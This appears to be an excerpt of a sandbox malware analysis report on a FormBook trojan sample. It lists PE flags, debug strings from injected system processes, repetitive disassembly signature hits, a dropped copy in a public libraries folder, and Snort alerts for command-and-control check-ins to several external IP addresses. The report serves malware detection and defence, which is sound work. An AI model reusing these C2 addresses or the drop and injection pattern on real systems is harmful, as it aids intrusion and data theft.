Source: Form_TT_EUR57,890.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.411546423.0000000007BA0000.00000002.00000001.sdmp
Source: Binary string: mshta.pdbGCTL source: rundll32.exe, 0000001C.00000002.865904880.00000000051C7000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: logagent.exe, 00000004.00000002.513978427.0000000004A5F000.00000040.00000001.sdmp, mshta.exe, 0000001A.00000003.468583820.0000000002D50000.00000004.00000001.sdmp, rundll32.exe, 0000001C.00000002.863838057.0000000004C90000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: logagent.exe, mshta.exe, rundll32.exe, 0000001C.00000002.863838057.0000000004C90000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdb source: mshta.exe, 0000001A.00000002.496580927.0000000002D00000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL source: mshta.exe, 0000001A.00000002.496580927.0000000002D00000.00000040.00000001.sdmp
Source: Binary string: mshta.pdb source: rundll32.exe, 0000001C.00000002.865904880.00000000051C7000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.411546423.0000000007BA0000.00000002.00000001.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [ebp-0Ch] (1_3_02C8EA30)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [ebp+08h] (1_3_02C8EA30)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov edx, dword ptr [eax] (1_3_02C8EBDC)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov ebx, dword ptr [ecx] (1_3_02C8EBDC)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then xor ecx, ecx (1_3_02C8EB88)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then xor edx, edx (1_3_02C8EB00)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then test eax, 80000000h (1_3_02C8EB00)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then or edx, 00000080h (1_3_02C8EB00)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then test eax, 80000000h (1_3_02C8EB00)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then or edx, 02h (1_3_02C8EB00)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then or edx, 01h (1_3_02C8EB00)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [ebp-04h] (1_3_02C8E99C)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then lea edx, dword ptr [ebp-08h] (1_3_02C8E944)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [esi] (1_3_02C8EE2C)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [edi] (1_3_02C8EE2C)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [edi] (1_3_02C8EE2C)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [004199DCh] (1_3_02C8EE2C)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then push 00000004h (1_3_02C8EE2C)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [004199D4h] (1_3_02C8EE2C)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [esi] (1_3_02C8EE2C)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [004199C0h] (1_3_02C8EE2C)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then push 00000000h (1_3_02C8EE2C)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [004199C8h] (1_3_02C8EE2C)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [004199C8h] (1_3_02C8EE2C)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [004199C8h] (1_3_02C8EE2C)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then push 004199E0h (1_3_02C8EE2C)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then xor eax, eax (1_3_02C8EE2C)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [esi] (1_3_02C8EE24)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [edi] (1_3_02C8EE24)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [edi] (1_3_02C8EE24)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [004199DCh] (1_3_02C8EE24)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then push 00000004h (1_3_02C8EE24)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [004199D4h] (1_3_02C8EE24)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [esi] (1_3_02C8EE24)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [004199C0h] (1_3_02C8EE24)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then push 00000000h (1_3_02C8EE24)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [004199C8h] (1_3_02C8EE24)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [004199C8h] (1_3_02C8EE24)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [004199C8h] (1_3_02C8EE24)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then push 004199E0h (1_3_02C8EE24)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then xor eax, eax (1_3_02C8EE24)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then test eax, 15000000h (1_3_02C8EC84)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [00419A0Ch] (1_3_02C8EC94)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [004199ECh] (1_3_02C8EC94)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [00419A0Ch] (1_3_02C8EC94)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [00419A0Ch] (1_3_02C8EC94)
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe; Code function: 4x nop then mov eax, dword ptr [ebx] (1_3_02C8EC94)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [ebp-0Ch] (16_3_02CAEA30)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [ebp+08h] (16_3_02CAEA30)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov edx, dword ptr [eax] (16_3_02CAEBDC)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov ebx, dword ptr [ecx] (16_3_02CAEBDC)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then xor ecx, ecx (16_3_02CAEB88)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then xor edx, edx (16_3_02CAEB00)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then test eax, 80000000h (16_3_02CAEB00)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then or edx, 00000080h (16_3_02CAEB00)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then test eax, 80000000h (16_3_02CAEB00)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then or edx, 02h (16_3_02CAEB00)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then or edx, 01h (16_3_02CAEB00)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [ebp-04h] (16_3_02CAE99C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then lea edx, dword ptr [ebp-08h] (16_3_02CAE944)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [esi] (16_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [edi] (16_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [edi] (16_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199DCh] (16_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then push 00000004h (16_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199D4h] (16_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [esi] (16_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199C0h] (16_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then push 00000000h (16_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199C8h] (16_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199C8h] (16_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199C8h] (16_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then push 004199E0h (16_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then xor eax, eax (16_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [esi] (16_3_02CAEE24)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [edi] (16_3_02CAEE24)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [edi] (16_3_02CAEE24)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199DCh] (16_3_02CAEE24)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then push 00000004h (16_3_02CAEE24)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199D4h] (16_3_02CAEE24)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [esi] (16_3_02CAEE24)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199C0h] (16_3_02CAEE24)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then push 00000000h (16_3_02CAEE24)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199C8h] (16_3_02CAEE24)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199C8h] (16_3_02CAEE24)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199C8h] (16_3_02CAEE24)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then push 004199E0h (16_3_02CAEE24)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then xor eax, eax (16_3_02CAEE24)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then test eax, 15000000h (16_3_02CAEC84)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [00419A0Ch] (16_3_02CAEC94)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199ECh] (16_3_02CAEC94)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [00419A0Ch] (16_3_02CAEC94)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [00419A0Ch] (16_3_02CAEC94)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [ebx] (16_3_02CAEC94)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [ebp-0Ch] (19_3_02CAEA30)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [ebp+08h] (19_3_02CAEA30)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov edx, dword ptr [eax] (19_3_02CAEBDC)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov ebx, dword ptr [ecx] (19_3_02CAEBDC)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then xor ecx, ecx (19_3_02CAEB88)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then xor edx, edx (19_3_02CAEB00)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then test eax, 80000000h (19_3_02CAEB00)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then or edx, 00000080h (19_3_02CAEB00)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then test eax, 80000000h (19_3_02CAEB00)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then or edx, 02h (19_3_02CAEB00)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then or edx, 01h (19_3_02CAEB00)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [ebp-04h] (19_3_02CAE99C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then lea edx, dword ptr [ebp-08h] (19_3_02CAE944)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [esi] (19_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [edi] (19_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [edi] (19_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199DCh] (19_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then push 00000004h (19_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199D4h] (19_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [esi] (19_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199C0h] (19_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then push 00000000h (19_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199C8h] (19_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199C8h] (19_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [004199C8h] (19_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then push 004199E0h (19_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then xor eax, eax (19_3_02CAEE2C)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [esi] (19_3_02CAEE24)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [edi] (19_3_02CAEE24)
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; Code function: 4x nop then mov eax, dword ptr [edi] (19_3_02CAEE24)
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199DCh]19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000004h19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199D4h]19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C0h]19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000000h19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 004199E0h19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor eax, eax19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 15000000h19_3_02CAEC84
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]19_3_02CAEC94
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199ECh]19_3_02CAEC94
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]19_3_02CAEC94
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]19_3_02CAEC94
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebx]19_3_02CAEC94
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]19_3_02D78AF4
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199ECh]19_3_02D78AF4
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]19_3_02D78AF4
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]19_3_02D78AF4
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebx]19_3_02D78AF4
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 15000000h19_3_02D78AE4
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov edx, dword ptr [eax]19_3_02D78A3C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov ebx, dword ptr [ecx]19_3_02D78A3C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp-0Ch]19_3_02D78890
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp+08h]19_3_02D78890
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor ecx, ecx19_3_02D789E8
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor edx, edx19_3_02D78960
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 80000000h19_3_02D78960
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 00000080h19_3_02D78960
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 80000000h19_3_02D78960
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 02h19_3_02D78960
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 01h19_3_02D78960
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]19_3_02D787FC
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then lea edx, dword ptr [ebp-08h]19_3_02D787A4
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199DCh]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000004h19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199D4h]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C0h]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000000h19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 004199E0h19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor eax, eax19_3_02D78C8C
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then pop edi26_2_104261B2
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then pop edi26_2_10426213
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then pop edi26_2_1041C3C2

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 23.27.129.115:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 23.27.129.115:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 23.27.129.115:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 86.105.245.69:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 86.105.245.69:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 86.105.245.69:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 35.186.238.101:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 35.186.238.101:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 35.186.238.101:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49765 -> 64.190.62.111:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49765 -> 64.190.62.111:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49765 -> 64.190.62.111:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49771 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49771 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49771 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49772 -> 23.27.129.115:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49772 -> 23.27.129.115:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49772 -> 23.27.129.115:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49774 -> 86.105.245.69:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49774 -> 86.105.245.69:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49774 -> 86.105.245.69:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49775 -> 35.186.238.101:80
